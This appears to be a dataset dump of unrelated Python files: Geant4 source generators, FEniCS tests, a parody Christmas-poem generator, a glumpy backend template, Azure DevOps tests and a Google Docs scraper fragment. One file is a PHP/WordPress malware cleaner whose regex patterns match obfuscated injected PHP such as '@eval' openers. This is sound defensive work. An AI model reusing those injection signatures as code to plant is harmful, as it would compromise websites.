text stringlengths 957 885k |
|---|
<reponame>qihuilyu/P2T
import sys, os
from os.path import join as pjoin
import math
import numpy as np
from rotation import inv_rotbeam
TEMPLATES = pjoin(os.path.abspath(os.path.dirname(__file__)), 'templates')
def generate_beamon(stream, nparticles, nruns=1):
"""write entire beamon file contents to stream for requested number of particles over requested number of runs"""
for ii in range(nruns):
stream.write('/run/beamOn {:d}\n'.format(nparticles))
return stream
def generate_init(stream, nthreads, magfield=(0,0,1.5, 'tesla'), desc='Geant4 general initialization'):
with open(pjoin(TEMPLATES, 'init.in.tpl'), 'r') as fd:
stream.write(
fd.read().format(
description=desc,
nthreads=nthreads,
magx=magfield[0],
magy=magfield[1],
magz=magfield[2],
magu=magfield[3],
)
)
return stream
def calculate_plane_rotation(angle_gantry, angle_couch, angle_coll):
"""calculate x' and y' unit vectors for given rotations
# source z' is parallel with beam direction"""
xp = inv_rotbeam(np.array([1,0,0]), angle_gantry, angle_couch, angle_coll)
yp = -inv_rotbeam(np.array([0,0,1]), angle_gantry, angle_couch, angle_coll)
return xp, yp
def is_numeric(x):
try:
float(x)
return True
except:
return False
def generate_gps_photon(stream, source, focus, angle_gantry, angle_couch, angle_coll, beamletsize, sad, sfd, energy_mev, desc='Diverging Square field', gps_template=None):
"""Generate the gps input file using a template
Args:
idx (int): index of beamlet in beam (row-major order)
source (x, y, z, u): coordinates
focus (x, y, z, u): coordinates
angle_gantry (float): gantry angle
beamletsize (x, z, u)
sad (float): sad (units must match beamletsize units)
sfd (float): src-focus-distance (units must match beamletsize units)
"""
extra_kwargs = {}
# try to match requested template
if gps_template is not None:
fullpath = pjoin(TEMPLATES, gps_template)
if not os.path.isfile(fullpath):
raise FileNotFoundError('GPS template "{}" doesn\'t exist'.format(fullpath))
else:
if energy_mev is not None and is_numeric(energy_mev):
gps_template = 'gps_photon_mono.mac.tpl'
extra_kwargs['energy'] = float(energy_mev)
else:
gps_template = 'gps_photon_6MV.mac.tpl'
xp, yp = calculate_plane_rotation(angle_gantry, angle_couch, angle_coll)
adj_fsize = [0.5*sfd/sad*beamletsize[ii] for ii in range(2)]
with open(pjoin(TEMPLATES, gps_template), 'r') as fd:
stream.write(
fd.read().format(
description=desc,
cx=source[0],
cy=source[1],
cz=source[2],
cu=source[3],
rot1x=xp[0],
rot1y=xp[1],
rot1z=xp[2],
rot2x=yp[0],
rot2y=yp[1],
rot2z=yp[2],
fsx=adj_fsize[0],
fsy=adj_fsize[1],
fsu=beamletsize[2],
fx=focus[0],
fy=focus[1],
fz=focus[2],
fu=focus[3],
**extra_kwargs,
)
)
return stream
def generate_gps_electron(stream, source, focus, angle_gantry, angle_couch, angle_coll, beamletsize, sad, sfd, energy_mev, desc='Diverging Square field', gps_template=None):
"""Generate the gps input file using a template
Args:
idx (int): index of beamlet in beam (row-major order)
source (x, y, z, u): coordinates
focus (x, y, z, u): coordinates
angle_gantry (float): gantry angle
beamletsize (x, z, u)
sad (float): sad (units must match beamletsize units)
sfd (float): src-focus-distance (units must match beamletsize units)
energy (float): Mono-energetic beam energy (units: MeV)
"""
# try to match requested template
if gps_template is not None:
fullpath = pjoin(TEMPLATES, gps_template)
if not os.path.isfile(fullpath):
raise FileNotFoundError('GPS template "{}" doesn\'t exist'.format(fullpath))
else:
gps_template = 'gps_electron_mono.mac.tpl'
xp, yp = calculate_plane_rotation(angle_gantry, angle_couch, angle_coll)
adj_fsize = [0.5*sfd/sad*beamletsize[ii] for ii in range(2)]
with open(pjoin(TEMPLATES, gps_template), 'r') as fd:
stream.write(
fd.read().format(
description=desc,
cx=source[0],
cy=source[1],
cz=source[2],
cu=source[3],
rot1x=xp[0],
rot1y=xp[1],
rot1z=xp[2],
rot2x=yp[0],
rot2y=yp[1],
rot2z=yp[2],
fsx=adj_fsize[0],
fsy=adj_fsize[1],
fsu=beamletsize[2],
fx=focus[0],
fy=focus[1],
fz=focus[2],
fu=focus[3],
energy=float(energy_mev),
)
)
return stream
def generate_gps_proton(stream, source, focus, angle_gantry, angle_couch, angle_coll, beamletsize, sad, sfd, energy_mev, desc='Diverging Square field', gps_template=None):
"""Generate the gps input file using a template
Args:
idx (int): index of beamlet in beam (row-major order)
source (x, y, z, u): coordinates
focus (x, y, z, u): coordinates
angle_gantry (float): gantry angle
beamletsize (x, z, u)
sad (float): sad (units must match beamletsize units)
sfd (float): src-focus-distance (units must match beamletsize units)
energy (float): Mono-energetic beam energy (units: MeV)
"""
# try to match requested template
if gps_template is not None:
fullpath = pjoin(TEMPLATES, gps_template)
if not os.path.isfile(fullpath):
raise FileNotFoundError('GPS template "{}" doesn\'t exist'.format(fullpath))
else:
gps_template = 'gps_proton_mono.mac.tpl'
xp, yp = calculate_plane_rotation(angle_gantry, angle_couch, angle_coll)
adj_fsize = [0.5*sfd/sad*beamletsize[ii] for ii in range(2)]
with open(pjoin(TEMPLATES, gps_template), 'r') as fd:
stream.write(
fd.read().format(
description=desc,
cx=source[0],
cy=source[1],
cz=source[2],
cu=source[3],
rot1x=xp[0],
rot1y=xp[1],
rot1z=xp[2],
rot2x=yp[0],
rot2y=yp[1],
rot2z=yp[2],
fsx=adj_fsize[0],
fsy=adj_fsize[1],
fsu=beamletsize[2],
fx=focus[0],
fy=focus[1],
fz=focus[2],
fu=focus[3],
energy=float(energy_mev),
)
)
return stream
|
#!/usr/bin/env python
"""
A very-specific malware search and removal program for PHP / WordPress v1.0
The MIT License (MIT)
Copyright (c) 2015 <NAME>.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import optparse
import os
import re
# Note: "verbose" default is True for CLI calls, but False for import
DefaultConfig = {
"verbose": False,
"verbose_clean": False,
"verbose_missing": False,
"dry_run": True
}
# TODO: Handle a pattern list
#pattern = r'\<\?php \@eval'
#pattern = r'\<\?php \$GLOBALS\[\$GLOBALS\['
#pattern = r'\<\?php error\_reporting\(0\)\;'
pattern = r'\<\?php if\(\!isset\(\$GLOBALS\[\"\\x61\\156\\x75\\156\\x61\"\]\)\) .* \$gpdkvqcaee\=\$msuqldfhhd\-1\; \?\>'
prog = re.compile(pattern)
def test_regex(filename='/home/buckhead/public_html.hack/500.php'):
if file_has_code(filename):
print "MATCH FOUND"
else:
print "MATCH NOT FOUND"
def file_has_code(filename):
""" Test if file has offending code on its first line. """
line = open(filename, mode='r').readline()
match = prog.match(line)
if match:
return True
else:
return False
def remove_offending_code(haystack, repl=''):
""" Remove offending code from haystack (str), optionally replacing it with another string. """
return prog.sub(repl, haystack)
def replace_lines(filename, conf=DefaultConfig, repl=''):
""" Replace first line on a file with the specified string(s).
@see http://stackoverflow.com/a/15469189/1023107
"""
with open(filename) as fin:
lines = fin.readlines()
lines[0] = remove_offending_code(lines[0], repl)
if conf["dry_run"]:
try:
print lines[0]
print lines[1]
except IndexError:
pass
else:
with open(filename, 'w') as fout:
for line in lines:
fout.write(line)
def clean_file(filename, conf=DefaultConfig):
""" Clean file. """
if os.path.exists(filename):
if file_has_code(filename):
if conf["verbose"]:
print "Fixing : ", filename
replace_lines(filename, conf)
else:
if conf["verbose_clean"]:
print "Clean : ", filename
else:
if conf["verbose_missing"]:
print "Missing: ", filename
def main(filename='', index_filename='', conf=DefaultConfig):
""" Main. """
if conf["dry_run"]:
print "**** INFO: DRY RUN. No changes will be applied. ****"
if index_filename:
index = open(index_filename, mode='r')
cnt = 0
for filename in index:
filename = filename.rstrip('\n')
if len(filename) > 0 and filename != "DONE":
clean_file(filename, conf)
cnt = cnt + 1
# for testing on first few files
#if cnt > 2:
#break
index.close()
elif filename:
clean_file(filename, conf)
else:
raise IOError("You must specify either a filename or an index filename.")
if conf["dry_run"]:
print "**** INFO: DRY RUN. No changes have been applied. ****"
if __name__ == '__main__':
usage = "python %prog [options] [-f] [-s FILENAME] [-i INDEX_FILENAME] "
parser = optparse.OptionParser(usage=usage)
parser.add_option("-d", "--dry-run",
action="store_true", dest="dry_run", default=DefaultConfig["dry_run"],
help="Dry-run. Does not make actual changes to files (default).")
parser.add_option("-f", "--force",
action="store_false", dest="dry_run",
help="Force run. Makes changes to files.")
parser.add_option("-s", "--source",
dest="filename", metavar="FILENAME",
help="Source file to be cleaned.")
parser.add_option("-i", "--index",
dest="index", metavar="INDEX_FILENAME",
help="Text file containing new-line delimited list of files to be cleaned.")
parser.add_option("-c", "--verbose-clean",
action="store_true", dest="verbose_clean", default=DefaultConfig["verbose_clean"],
help="Warn about clean files (different offending code).")
parser.add_option("-m", "--verbose-missing",
action="store_true", dest="verbose_missing", default=DefaultConfig["verbose_missing"],
help="Warn about missing files.")
# Note: "verbose" default is True for CLI calls, but False for import
parser.add_option("-v", "--verbose",
action="store_true", dest="verbose", default=True,
help="verbose output (default)")
parser.add_option("-q", "--quiet",
action="store_false", dest="verbose",
help="minimal output")
options, args = parser.parse_args()
try:
main(options.filename, options.index, {
"verbose": options.verbose,
"verbose_clean": options.verbose_clean,
"verbose_missing": options.verbose_missing,
"dry_run": options.dry_run
})
except IOError:
print "A very-specific malware search and removal program for PHP / WordPress v1.0"
parser.print_help()
|
<reponame>MiroK/nEuronMI
from neuronmi.simulators.solver.embedding import EmbeddedMesh
from neuronmi.simulators.solver.transferring import SubMeshTransfer
import dolfin as df
import numpy as np
import unittest
class TestCases(unittest.TestCase):
def test_to_DG0(self):
subdomains = (df.CompiledSubDomain('near(x[0], 0.5)'), df.DomainBoundary())
for subd in subdomains:
mesh = df.UnitCubeMesh(4, 4, 4)
facet_f = df.MeshFunction('size_t', mesh, 2, 0)
subd.mark(facet_f, 1)
submesh = EmbeddedMesh(facet_f, 1)
transfer = SubMeshTransfer(mesh, submesh)
V = df.FunctionSpace(mesh, 'Discontinuous Lagrange Trace', 0)
Vsub = df.FunctionSpace(submesh, 'DG', 0)
to_Vsub = transfer.compute_map(Vsub, V, strict=False)
# Set degree 0 to get the quad order right
f = df.Expression('x[0] + 2*x[1] - x[2]', degree=0)
fV = df.interpolate(f, V)
fsub = df.Function(Vsub)
to_Vsub(fsub, fV)
error = df.inner(fsub - f, fsub - f)*df.dx(domain=submesh)
error = df.sqrt(abs(df.assemble(error)))
self.assertTrue(error < 1E-13)
def test_from_DG0(self):
def main(n, chi, measure, restrict):
mesh = df.UnitCubeMesh(2, n, n)
facet_f = df.MeshFunction('size_t', mesh, 2, 0)
chi.mark(facet_f, 1)
submesh = EmbeddedMesh(facet_f, 1)
transfer = SubMeshTransfer(mesh, submesh)
V = df.FunctionSpace(mesh, 'Discontinuous Lagrange Trace', 0)
Vsub = df.FunctionSpace(submesh, 'DG', 0)
to_V = transfer.compute_map(V, Vsub, strict=False)
# Set degree 0 to get the quad order right
f = df.Expression('x[0] + 2*x[1] - x[2]', degree=0)
fsub = df.interpolate(f, Vsub)
fV = df.Function(V)
to_V(fV, fsub)
y = V.tabulate_dof_coordinates().reshape((V.dim(), -1))
x = Vsub.tabulate_dof_coordinates().reshape((Vsub.dim(), -1))
# Correspondence of coordinates
self.assertTrue(np.linalg.norm(y[transfer.cache] - x) < 1E-13)
# These are all the coordinates
idx = list(set(range(V.dim())) - set(transfer.cache))
self.assertTrue(not any(chi.inside(xi, True) for xi in y[idx]))
dS_ = df.Measure(measure, domain=mesh, subdomain_data=facet_f)
# Stange that this is not exact
error = df.inner(restrict(fV - f), restrict(fV - f))*dS_(1)
error = df.sqrt(abs(df.assemble(error, form_compiler_parameters={'quadrature_degree': 0})))
return error
# Trick domains boundary beacuse we want to use inside properly?
bdry = df.CompiledSubDomain(' || '.join(['near(x[0]*(1-x[0]), 0)',
'near(x[1]*(1-x[1]), 0)',
'near(x[2]*(1-x[2]), 0)']))
inputs = ((df.CompiledSubDomain('near(x[0], 0.5)'), 'dS', df.avg),
(bdry, 'ds', lambda x: x))
for chi, measure, restrict in inputs:
errors = []
for n in (2, 4, 8, 16):
e = main(n, chi, measure, restrict)
self.assertTrue(not errors or e < errors[-1])
errors.append(e)
def test_to_DG0_subdomain(self):
mesh = df.UnitSquareMesh(4, 4)
cell_f = df.MeshFunction('size_t', mesh, 2, 0)
df.CompiledSubDomain('x[0] < 0.5 + DOLFIN_EPS').mark(cell_f, 1)
submesh = EmbeddedMesh(cell_f, 1)
transfer = SubMeshTransfer(mesh, submesh)
V = df.FunctionSpace(mesh, 'DG', 0)
Vsub = df.FunctionSpace(submesh, 'DG', 0)
to_Vsub = transfer.compute_map(Vsub, V, strict=True)
# Set degree 0 to get the quad order right
f = df.Expression('x[0] + 2*x[1]', degree=0)
fV = df.interpolate(f, V)
fsub = df.Function(Vsub)
to_Vsub(fsub, fV)
error = df.inner(fsub - f, fsub - f)*df.dx(domain=submesh)
error = df.sqrt(abs(df.assemble(error)))
self.assertTrue(error < 1E-13)
def test_from_DG0_subdomain(self):
mesh = df.UnitSquareMesh(4, 4)
cell_f = df.MeshFunction('size_t', mesh, 2, 0)
df.CompiledSubDomain('x[0] < 0.5 + DOLFIN_EPS').mark(cell_f, 1)
submesh = EmbeddedMesh(cell_f, 1)
transfer = SubMeshTransfer(mesh, submesh)
V = df.FunctionSpace(mesh, 'DG', 0)
Vsub = df.FunctionSpace(submesh, 'DG', 0)
to_V = transfer.compute_map(V, Vsub, strict=True)
# Set degree 0 to get the quad order right
f = df.Expression('x[0] + 2*x[1]', degree=0)
fsub = df.interpolate(f, Vsub)
fV = df.Function(V)
to_V(fV, fsub)
error = df.inner(fV - f, fV - f)*df.dx(domain=submesh)
error = df.sqrt(abs(df.assemble(error)))
self.assertTrue(error < 1E-13)
# ---------------------------------------------------------------------------
if __name__ == '__main__':
unittest.main()
|
# -*- coding: utf-8 -*-
"""Final Project Poem
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1dX7e5VDsDkr_Go9GlTQbMDyOUOiBC11-
"""
import random
day = ["year","hour","second","minute","dawn","evening"]
day2 = ["Easter","Hanukkah","Easter","Black Friday","my birthday","Mothers Day","Fathers Day","Monday","Friday"]
house = ["boathouse","firehouse"]
creature = ["demon","angel","fairy","Walmart employee"]
creature2 = ["blouse;","spouse;","a tiny, tiny, tiny mouse;"]
stockings = ["human skulls","socks","poptarts","bluetooth speakers","expired milk jugs","rotting leftover turkey from Thanksgiving"]
chimney = ["trashcan","sink","toilet","VCR","KFC deep fryer"]
care = ["hair,","auclair,","despair,","flair,"]
Santa = ["Jesus","the cute pizza delievery boy","my estranged uncle","a guy named Jeff","my annoying little cousin","the Walmart employee","my boss","Vishnu"]
there = ["scared,","impaired,","repaired,"]
children = ["Target employees", "little devils that they are","cute little bunnies"]
beds = ["shed,","boats made of lead,","sled,","very comfy beds," ]
sugarplums = ["disaster","the apocalypse","their imminent demise","the far flung future","fortune"]
heads = ["bread,","thread,","very heavy heads,"]
kerchief = ["book","druken rage","car","cozy couch","hot tub"]
cap = ["map,","cap,"]
L = ["short ","long ","eternal ","30 minute long "]
nap = ["rap,","trap,"]
lawn = ["edge of a cliff","lawn","patio","porch","balcony"]
clatter = ["loud pitter-patter,","clatter,","splatter,","big explosion made of antimatter,"]
sprang = ["leaped","vaulted","sprung forth","emerged","crawled out","rolled out"]
window = ["castle","Chipolte","Toys R Us","Walmart","kitchen"]
flash = ["bird,","discarded curd,","anxious nerd,","stampeding herd,"]
tore = ["Ripped","Forced","Used my big muscles to","Asked my dad to","I lazily went to","I reluctantly went to"]
sash = ["a naughty word.","a pot full of food that was recentlly stirred.","a book whose words were quite blurred.","a whisper that went unheard."]
moon = ["mid-day sun","setting sun","rising sun","blistering sun","twighlight moon","full moon"]
newfallen = ["fresh","17-day old"]
midday = ["a new pair of shoes","a wedding dress fit for a princess","the full moon at midnight"]
below = ["embargoed,","that gave off an unearthly glow,","that made me go 'whoa',"]
eyes = ["feet","hands","socks","hat","hamsters"]
appear = ["lear","lean back in fear","all but disappear"]
sleigh = ["horse","wooden house","boat","cake"]
reindeer = ["souvenirs","mutineers","peers"]
driver = ["grandma","grandpa","decaying mummy","Mario from Super Mario 64","Bowser","<NAME>","Yoshi"]
lively = ["unhinged","unaware","bloated","disheveled"]
quick = ["slick","non-stick","a real prick",]
in_a_moment = ["way too late that","after the fact that","instantlly"]
Nick = ["Prick","Ostpolitik"]
eagles = ["mice","rodents","black widow spiders","several rabbits tied together","a kid who ate all of his Halloween candy in one day"]
came = ["brought shame","were of great acclaim","were to blame","brought their own games","proclaimed"]
whistled = ["hollered","screeched","yodeled"]
by_name = ["mean names","weird names"]
Dasher = ["Blinko","Stinko","Potato-Masher","Prom-Queen-Disaster"]
Dancer = ["Bargin-Bin","<NAME>","<NAME>","Blues-Clues","Clifford-The-Big-Red-Reindeer"]
porch = ["the 7-11 store","the local Homedepot","my Exs house","the Misty Mountains", "Helms-Deep","Mt. Doom"]
wall = ["local mall","sprawl"]
dash_away = ["flee for your lives","fly away","get on your way with delay","get going"]
fly = ["dry","sigh","give up and cry","fall nearby","get seen by my eyes"]
an_obstacle = ["the elementary school principal","the shopping mall security guard","that highschool bully who just won't leave you alone"]
sky = ["the starry sky","the resupply","Shanghai"]
coursers = ["robbers","mailmen","entire staff of your local Walmart","flock of geese"]
flew = ["drew","knew","stewed","flew"]
toys = ["broken glass and needles","way too many beer bottles","500 copies of Halo Reach for Xbox 360"]
line_1 = "Twas the " + random.choice(day) + " before " + random.choice(day2) + ", when all through the " + random.choice(house)
line_2 = "Not a " + random.choice(creature) + " was stirring, not even a " + random.choice(creature2)
line_3 = "The " + random.choice(stockings) + " were hung by the " + random.choice(chimney) + " with " + random.choice(care)
line_4 = "In hopes that " + random.choice(Santa) + " soon would be " + random.choice(there)
line_5 = "The " + random.choice(children) + " were nestled all snug in their " + random.choice(beds)
line_6 = "While visions of " + random.choice(sugarplums) + " danced in their " + random.choice(heads)
line_7 = "And mamma in her " + random.choice(kerchief) + ", and I in my " + random.choice(cap)
line_8 = "Had just settled down for a " + random.choice(L) + random.choice(nap)
line_9 = "When out on the " + random.choice(lawn) + " there arose such a " + random.choice(clatter)
line_10 = "I " + random.choice(sprang) + " from the bed to see what was the matter."
line_11 = "Away to the " + random.choice(window) + ", I flew like a " + random.choice(flash)
line_12 = random.choice(tore) + " open the shutters and threw up " + random.choice(sash)
line_13 = "The " + random.choice(moon) + " on the breast of the " + random.choice(newfallen) + " snow"
line_14 = "Gave the lustre of " + random.choice(midday) + " to objects " + random.choice(below)
line_15 = "When what to my wondering " + random.choice(eyes) + " should " + random.choice(appear) + ","
line_16 = "But a miniture " + random.choice(sleigh) + " and eight tiny " + random.choice(reindeer) + ","
line_17 = "With a little old " + random.choice(driver) + " so " + random.choice(lively) + " and " + random.choice(quick) + ","
line_18 = "I knew " + random.choice(in_a_moment) + " it must be St. " + random.choice(Nick) + "."
line_19 = "More rapid than " + random.choice(eagles) + " his coursers they " + random.choice(came) + ","
line_20 = "And he " + random.choice(whistled) + ", and shouted, and called them " + random.choice(by_name) + ";"
line_21 = "'Now " + random.choice(Dasher) + "! Now, " + random.choice(Dancer) + "! Now, Prancer And former US President Nixon!"
line_22 = "On, Comet! On, Stupid! On, Late Bloomer And Blitzen!"
line_23 = "To the top of " + random.choice(porch) + "! To the top of the " + random.choice(wall) + "!"
line_24 = "Now " + random.choice(dash_away) + " all!'"
line_25 = "As dry leaves that before the wild hurricane " + random.choice(fly) + ","
line_26 = "When they meet with " + random.choice(an_obstacle) + ", mount to " + random.choice(sky) + ","
line_27 = "So up to the house-top the " + random.choice(coursers) + " they " + random.choice(flew) + ","
line_28 = "With the sleigh full of " + random.choice(toys) + ", and St. Nicholas too."
print(line_1)
print("\t" + line_2)
print("\t" + line_3)
print("\t" + line_4)
print("\t" + line_5)
print("\t" + line_6)
print("\t" + line_7)
print("\t" + line_8)
print(line_9)
print("\t" + line_10)
print("\t" + line_11)
print("\t" + line_12)
print(line_13)
print("\t" + line_14)
print("\t" + line_15)
print("\t" + line_16)
print(line_17)
print("\t" + line_18)
print("\t" + line_19)
print("\t" + line_20)
print(line_21)
print("\t" + line_22)
print("\t" + line_23)
print("\t" + line_24)
print(line_25)
print("\t" + line_26)
print("\t" + line_27)
print("\t" + line_28) |
# -----------------------------------------------------------------------------
# Copyright (c) 2009-2016 <NAME>. All rights reserved.
# Distributed under the (new) BSD License.
# -----------------------------------------------------------------------------
"""
Template backend for writing a new backend.
"""
import os, sys
from glumpy import gl
from glumpy.log import log
from glumpy.app import configuration
from glumpy.app.window import window
# Backend name
__name__ = "Template"
# Backend version (if available)
__version__ = ""
# Backend availability
__availability__ = False
# Whether the framework has been initialized
__initialized__ = False
# Active windows
__windows__ = []
# ---------------------------------------------------- convenient functions ---
def name(): return __name__
def version(): return __version__
def available(): return __availability__
# --------------------------------------------------------------- init/exit ---
def __init__():
global __initialized__
__initialized__ = True
def __exit__():
global __initialized__
__initialized__ = False
# ------------------------------------------------------------ availability ---
try:
import ToolKit # Replace with actual toolkit
__availability__ = True
__version__ = ""
__key_map__ = { }
__mouse_map__ = { }
except ImportError:
__availability__ = False
__version__ = None
# -------------------------------------------------------------- capability ---
capability = {
"Window position get/set" : False,
"Window size get/set" : False,
"Multiple windows" : False,
"Mouse scroll events" : False,
"Non-decorated window" : False,
"Non-sizeable window" : False,
"Fullscreen mode" : False,
"Unicode processing" : False,
"Set GL version" : False,
"Set GL profile" : False,
"Share GL context" : False,
}
# ------------------------------------------------------- set_configuration ---
def set_configuration(configuration):
""" Set GL initialization here (depth buffer size, etc.) """
pass
# ------------------------------------------------------------------ Window ---
class Window(window.Window):
"""
Generic template for writing a new backend.
"""
def __init__( self, width=512, height=512, title=None, visible=True, aspect=None,
decoration=True, fullscreen=False, config=None, context=None, color=(0,0,0,1), vsync=False):
window.Window.__init__(self, width=width,
height=height,
title=title,
visible=visible,
aspect=aspect,
decoration=decoration,
fullscreen=fullscreen,
config=config,
context=context,
color=color)
# Create the native window here
pass
# Each on the events below must be called at some point This means you
# have to connect to key and mouse events using toolkit native methods
# and dispatch the event to glumpy event stack.
# self.dispatch_event('on_show')
# self.dispatch_event('on_hide')
# self.dispatch_event('on_close')
# self.dispatch_event('on_resize', width, height)
# self.dispatch_event('on_mouse_release', x, y, button)
# self.dispatch_event('on_mouse_press', x, y, button)
# self.dispatch_event('on_mouse_motion', x, y, dx, dy)
# self.dispatch_event('on_mouse_drag', x, y, dx, dy, button)
# self.dispatch_event('on_mouse_scroll', x, y, xoffset, yoffset)
# self.dispatch_event('on_key_press', symbol, modifiers)
# self.dispatch_event('on_key_release', symbol, modifiers)
# self.dispatch_event('on_character', u"%c" % character)
def show(self):
glfw.glfwShowWindow( self._native_window )
self.dispatch_event('on_show')
def hide(self):
glfw.glfwHideWindow( self._native_window )
self.dispatch_event('on_hide')
def close(self):
glfw.glfwSetWindowShouldClose(self._native_window, True)
glfw.glfwDestroyWindow(self._native_window)
__windows__.remove(self)
for i in range(len(self._timer_stack)):
handler, interval = self._timer_stack[i]
self._clock.unschedule(handler)
self.dispatch_event('on_close')
def set_title(self, title):
""" Set window title """
raise(NotImplemented)
def get_title(self, title):
""" Get window title """
raise(NotImplemented)
def set_size(self, width, height):
""" Set window size """
raise(NotImplemented)
def get_size(self):
""" Get window size """
raise(NotImplemented)
def set_position(self, x, y):
""" Set window position """
raise(NotImplemented)
def get_position(self):
""" Get window position """
raise(NotImplemented)
def swap(self):
""" Swap GL bufffers """
raise(NotImplemented)
def activate(self):
""" Make this window the (GL) active window """
raise(NotImplemented)
# ----------------------------------------------------------------- windows ---
def windows():
return __windows__
# ----------------------------------------------------------------- process ---
def process(dt):
""" Process events for all windows. Non blocking. """
# Poll for and process events
# -> Add toolkit specific code here to process events
# -> Must return (non bloking)
for window in __windows__:
# Make window active
window.activate()
# Clear window using window clear flags
gl.glClear(window._clearflags)
# Dispatch the main draw event
window.dispatch_event('on_draw', dt)
# Dispatch the idle event
window.dispatch_event('on_idle', dt)
# Swap buffers
window.swap()
return len(__windows__)
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import unittest
try:
# Attempt to load mock (works on Python 3.3 and above)
from unittest.mock import patch
except ImportError:
# Attempt to load mock (works on Python version below 3.3)
from mock import patch
from azext_devops.dev.pipelines.runs_artifacts import run_artifact_download, run_artifact_upload, run_artifact_list
from azext_devops.dev.common.services import clear_connection_cache
from azext_devops.test.utils.authentication import AuthenticatedTests
from azext_devops.devops_sdk.v5_0.build.build_client import BuildClient
from azext_devops.dev.common.const import ARTIFACTTOOL_PAT_ENVKEY
class TestPipelinesRunsArtifactsMethods(AuthenticatedTests):
_TEST_DEVOPS_ORGANIZATION = 'https://someorganization.visualstudio.com'
_TEST_DEVOPS_PROJECT = 'MyProject'
_TEST_PAT_TOKEN = 'Some_PAT_Token'
_TEST_ARTIFACT_NAME = 'artifactname'
_TEST_ARTIFACT_PATH = 'D:/Testpath'
def setUp(self):
self.authentication_setup()
self.authenticate()
self.get_client_patcher = patch('azext_devops.devops_sdk.connection.Connection.get_client')
self.get_artifacts_patcher = patch('azext_devops.devops_sdk.v5_0.build.build_client.BuildClient.get_artifacts')
self.run_artifacttool_patcher = patch('azext_devops.dev.common.artifacttool.ArtifactToolInvoker.run_artifacttool')
#start the patchers
self.mock_get_artifacts = self.get_artifacts_patcher.start()
self.mock_get_client = self.get_client_patcher.start()
self.mock_run_artifacttool = self.run_artifacttool_patcher.start()
# Set return values which will be same across tests
self.mock_get_client.return_value = BuildClient(base_url=self._TEST_DEVOPS_ORGANIZATION)
#clear connection cache before running each test
clear_connection_cache()
def tearDown(self):
patch.stopall()
def test_runs_artifacts_list(self):
# set return values
response = run_artifact_list(run_id=12345, organization=self._TEST_DEVOPS_ORGANIZATION,
project=self._TEST_DEVOPS_PROJECT, detect=None)
#assert
self.mock_get_artifacts.assert_called_once_with(build_id=12345, project=self._TEST_DEVOPS_PROJECT)
def test_runs_artifacts_download(self):
# set return values
response = run_artifact_download(
run_id=12345, artifact_name=self._TEST_ARTIFACT_NAME, path=self._TEST_ARTIFACT_PATH,
organization=self._TEST_DEVOPS_ORGANIZATION, project=self._TEST_DEVOPS_PROJECT, detect=None)
#assert
self.mock_run_artifacttool.assert_called_with(self._TEST_DEVOPS_ORGANIZATION,
[
'pipelineartifact',
'download',
'--service', self._TEST_DEVOPS_ORGANIZATION,
'--patvar', ARTIFACTTOOL_PAT_ENVKEY,
'--project', self._TEST_DEVOPS_PROJECT,
'--pipeline-id', 12345,
'--artifact-name', self._TEST_ARTIFACT_NAME,
'--path', self._TEST_ARTIFACT_PATH,
],
'Downloading')
def test_runs_artifacts_upload(self):
# set return values
response = run_artifact_upload(
run_id=12345, artifact_name=self._TEST_ARTIFACT_NAME, path=self._TEST_ARTIFACT_PATH,
organization=self._TEST_DEVOPS_ORGANIZATION, project=self._TEST_DEVOPS_PROJECT, detect=None)
#assert
self.mock_run_artifacttool.assert_called_with(self._TEST_DEVOPS_ORGANIZATION,
[
'pipelineartifact',
'publish',
'--service', self._TEST_DEVOPS_ORGANIZATION,
'--patvar', ARTIFACTTOOL_PAT_ENVKEY,
'--project', self._TEST_DEVOPS_PROJECT,
'--pipeline-id', 12345,
'--artifact-name', self._TEST_ARTIFACT_NAME,
'--path', self._TEST_ARTIFACT_PATH,
],
'Uploading')
if __name__ == '__main__':
unittest.main() |
import urllib.parse
import bs4
import copy
import hashlib
import os.path
import traceback
import WebRequest
from WebMirror.processor.ProcessorBase import PageProcessor
# import TextScrape.SiteArchiver
import common.util.urlFuncs as urlFuncs
import WebMirror.processor.ProcessorUtils.gDocParse as gdp
# import TextScrape.RelinkLookup
# import TextScrape.RELINKABLE as RELINKABLE
########################################################################################################################
#
# ## ## ### #### ## ## ###### ## ### ###### ######
# ### ### ## ## ## ### ## ## ## ## ## ## ## ## ## ##
# #### #### ## ## ## #### ## ## ## ## ## ## ##
# ## ### ## ## ## ## ## ## ## ## ## ## ## ###### ######
# ## ## ######### ## ## #### ## ## ######### ## ##
# ## ## ## ## ## ## ### ## ## ## ## ## ## ## ## ##
# ## ## ## ## #### ## ## ###### ######## ## ## ###### ######
#
########################################################################################################################
class GdocPageProcessor(PageProcessor):
wanted_mimetypes = ['text/html']
want_priority = 90
@staticmethod
def wantsUrl(url):
return urlFuncs.isGdocUrl(url)[0]
loggerPath = "Main.Text.GdocPageProcessor"
def __init__(self, pageUrl, pgContent, loggerPath, relinkable, scannedDomains=None, tlds=None, **kwargs):
self.loggerPath = loggerPath+".GDocExtract"
self.pageUrl = pageUrl
self._relinkDomains = set()
for url in relinkable:
self._relinkDomains.add(url)
self._tld = set()
self._scannedDomains = set()
# Tell the path filtering mechanism that we can fetch google doc files
# Not switchable, since not fetching google docs content from a google docs page
# wouldn't work too well.
self._scannedDomains.add('https://docs.google.com/document/')
self._scannedDomains.add('https://docs.google.com/spreadsheets/')
self._scannedDomains.add('https://drive.google.com/folderview')
